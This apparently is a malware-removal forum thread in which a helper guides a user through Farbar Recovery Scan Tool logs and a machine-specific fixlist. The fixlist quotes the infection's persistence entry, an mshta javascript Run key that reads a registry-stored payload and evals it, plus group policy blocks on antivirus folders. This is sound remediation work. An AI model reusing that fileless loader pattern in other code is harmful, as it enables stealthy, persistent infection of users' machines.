I cannot seem to get rid of this virus! It seems to have disconnected me from the internet AND block my Avast!
When I open it, it prompts, “This program is blocked by group policy. Contact your system administrator for more information”.
When I try to change group permissions, access is denied.
What can I do?
Hi lets have a quick look see
Please download Farbar Recovery Scan Tool and save it to your Desktop.
Note: You need to run the version compatible with your system. If you are not sure which version applies to your system download both of them and try to run them. Only one of them will run on your system, that will be the right version.
[*]Right click to run as administrator (XP users click run after receipt of Windows Security Warning - Open File). When the tool opens click Yes to disclaimer.
[*]Select additions at the bottom
[*]Press Scan button.
https://dl.dropboxusercontent.com/u/73555776/frst.JPG
[*]It will produce a log called FRST.txt in the same directory the tool is run from.
[*]Please attach both logs generated.
Okay so it was too large to post so here is the Addition.txt
http://pastebin.com/MwEG4Aw4
And here is the FRST.txt
http://pastebin.com/BgqqczPn
Okay so it was too large to postyou dont post ... you attach ;)
Hi, you have a multitude of Panda drivers running, after the fix instructions I will give the uninstall link for Panda
CAUTION : This fix is only valid for this specific machine, using it on another may break your computer
Open notepad and copy/paste the text in the quotebox below into it:
CreateRestorePoint: HKLM-x32\...\Run: [**8c7ad3ee<*>] => mshta javascript:bIs5Hg8O="pSFclXDWpJ";D4N=new%20ActiveXObject("WScript.Shell");kd6gQIy="rt";u4GQi=D4N.RegRead("HKLM\\software\\Wow6432Node\\05296abf\\16adedb0");uymJFElt5="8W";eval(u4GQi);g5u8WhiJ="6 (the data entry has 3 more characters). <===== ATTENTION (Value Name with invalid characters) HKLM-x32\...\Run: [**69fea1b4<*>] => "c:\users\kat\appdata\local\piqod\piqod.exe" <===== ATTENTION (Value Name with invalid characters) HKLM Group Policy restriction on software: C:\Program Files\AVAST Software <====== ATTENTION HKLM Group Policy restriction on software: C:\Program Files\COMODO <====== ATTENTION HKLM Group Policy restriction on software: C:\Program Files\Avira <====== ATTENTION HKLM Group Policy restriction on software: C:\Program Files\AVAST Software <====== ATTENTION HKLM Group Policy restriction on software: C:\Program Files\AVAST Software <====== ATTENTION HKLM Group Policy restriction on software: C:\Program Files\Avira <====== ATTENTION HKLM Group Policy restriction on software: C:\Program Files\Microsoft Security Client <====== ATTENTION HKLM Group Policy restriction on software: C:\Program Files\COMODO <====== ATTENTION HKLM Group Policy restriction on software: C:\Program Files\AVAST Software <====== ATTENTION HKLM Group Policy restriction on software: C:\Program Files\Avira <====== ATTENTION HKLM Group Policy restriction on software: C:\Program Files\Microsoft Security Client <====== ATTENTION HKLM Group Policy restriction on software: C:\Program Files\COMODO <====== ATTENTION HKLM Group Policy restriction on software: C:\Program Files\Microsoft Security Client <====== ATTENTION HKLM Group Policy restriction on software: C:\Program Files\AVAST Software <====== ATTENTION HKLM Group Policy restriction on software: C:\Program Files\COMODO <====== ATTENTION HKLM Group Policy restriction on software: C:\Program Files\Microsoft Security Client <====== ATTENTION HKLM Group Policy restriction on software: C:\Program Files\COMODO <====== ATTENTION HKLM Group Policy restriction on software: C:\Program Files\Avira <====== ATTENTION HKLM Group Policy restriction on software: C:\Program Files\COMODO <====== ATTENTION HKLM Group Policy restriction on software: C:\Program Files\Avira <====== ATTENTION HKLM Group Policy restriction on software: C:\Program Files\AVAST Software <====== ATTENTION HKLM Group Policy restriction on software: C:\Program Files\Avira <====== ATTENTION HKLM Group Policy restriction on software: C:\Program Files\Avira <====== ATTENTION HKLM Group Policy restriction on software: C:\Program Files\COMODO <====== ATTENTION HKLM Group Policy restriction on software: C:\Program Files\Microsoft Security Client <====== ATTENTION HKLM Group Policy restriction on software: C:\Program Files\AVAST Software <====== ATTENTION HKLM Group Policy restriction on software: C:\Program Files\COMODO <====== ATTENTION HKLM Group Policy restriction on software: C:\Program Files\AVAST Software <====== ATTENTION HKLM Group Policy restriction on software: C:\Program Files\Avira <====== ATTENTION HKLM Group Policy restriction on software: C:\Program Files\AVAST Software <====== ATTENTION HKLM Group Policy restriction on software: C:\Program Files\COMODO <====== ATTENTION HKLM Group Policy restriction on software: C:\Program Files\AVAST Software <====== ATTENTION HKLM Group Policy restriction on software: C:\Program Files\Microsoft Security Client <====== ATTENTION HKLM Group Policy restriction on software: C:\Program Files\COMODO <====== ATTENTION HKLM Group Policy restriction on software: C:\Program Files\Microsoft Security Client <====== ATTENTION HKLM Group Policy restriction on software: C:\Program Files\Avira <====== ATTENTION HKLM Group Policy restriction on software: C:\Program Files\Avira <====== ATTENTION HKLM Group Policy restriction on software: C:\Program Files\Microsoft Security Client <====== ATTENTION HKLM Group Policy restriction on software: C:\Program Files\COMODO <====== ATTENTION HKLM Group Policy restriction on software: C:\Program Files\Microsoft Security Client <====== ATTENTION HKLM Group Policy restriction on software: C:\Program Files\Microsoft Security Client <====== ATTENTION HKLM Group Policy restriction on software: C:\Program Files\AVAST Software <====== ATTENTION HKLM Group Policy restriction on software: C:\Program Files\Microsoft Security Client <====== ATTENTION HKLM Group Policy restriction on software: C:\Program Files\Avira <====== ATTENTION HKLM\...\Policies\Explorer\Run: [] => HKLM\...\Policies\Explorer\Run: [958791109] => C:\ProgramData\mssbuqxa.exe HKU\S-1-5-21-2106257821-329901463-4097938246-1000\...\Policies\Explorer: [Run] "C:\Users\KAT\AppData\Roaming\Microsoft\Windows\IEUpdate\whoami.exe" HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION HKU\S-1-5-21-2106257821-329901463-4097938246-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{407a203c-c634-491c-a6e4-cbfecc9d558a} <======= ATTENTION (Policy restriction on IP) Toolbar: HKU\S-1-5-21-2106257821-329901463-4097938246-1000 -> No Name - {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} - No File FF Plugin-x32: @ogplanet.com/npOGPPlugin -> C:\Windows\system32\npOGPPlugin.dll No File 2015-06-10 13:07 - 2015-06-10 13:07 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\by.xatab 2015-06-10 12:48 - 2015-06-10 19:40 - 00000000 ____H C:\ProgramData\@system.temp 2015-06-07 18:54 - 2015-06-07 18:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\i-Funbox DevTeam 2015-06-07 18:54 - 2015-06-07 18:54 - 00000000 ____D C:\Program Files (x86)\i-Funbox DevTeam Task: {B2164F79-DA12-4058-9999-106358D89330} - \odbcconf No Task File <==== ATTENTION Task: {947A6C47-874B-4C8F-B186-7D78AB6BF1D6} - \whoami No Task File <==== ATTENTION 2015-06-04 12:15 - 2015-06-04 12:15 - 00000480 ____H C:\Users\KAT\AppData\Roaming\麽鎒駓覜 C:\ProgramData\mssbuqxa.exe Reg: reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f Reg: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f RemoveProxy: CMD: netsh advfirewall reset CMD: netsh advfirewall set allprofiles state ON CMD: ipconfig /flushdns CMD: netsh winsock reset catalog CMD: netsh int ip reset c:\resetlog.txt CMD: ipconfig /release CMD: ipconfig /renew CMD: netsh int ipv4 reset CMD: netsh int ipv6 reset EmptyTemp: CMD: bitsadmin /reset /allusers
Save this as fixlist.txt, in the same location as FRST.exe
https://dl.dropboxusercontent.com/u/73555776/FRSTfix.JPG
Run FRST and press Fix
On completion a log will be generated please post that
THEN
Download the Panda uninstall tool from here and run
http://www.pandasecurity.com/resources/sop/UNINSTALLER.exe
NEXT could you run a fresh FRST scan to ensure that all of Panda has gone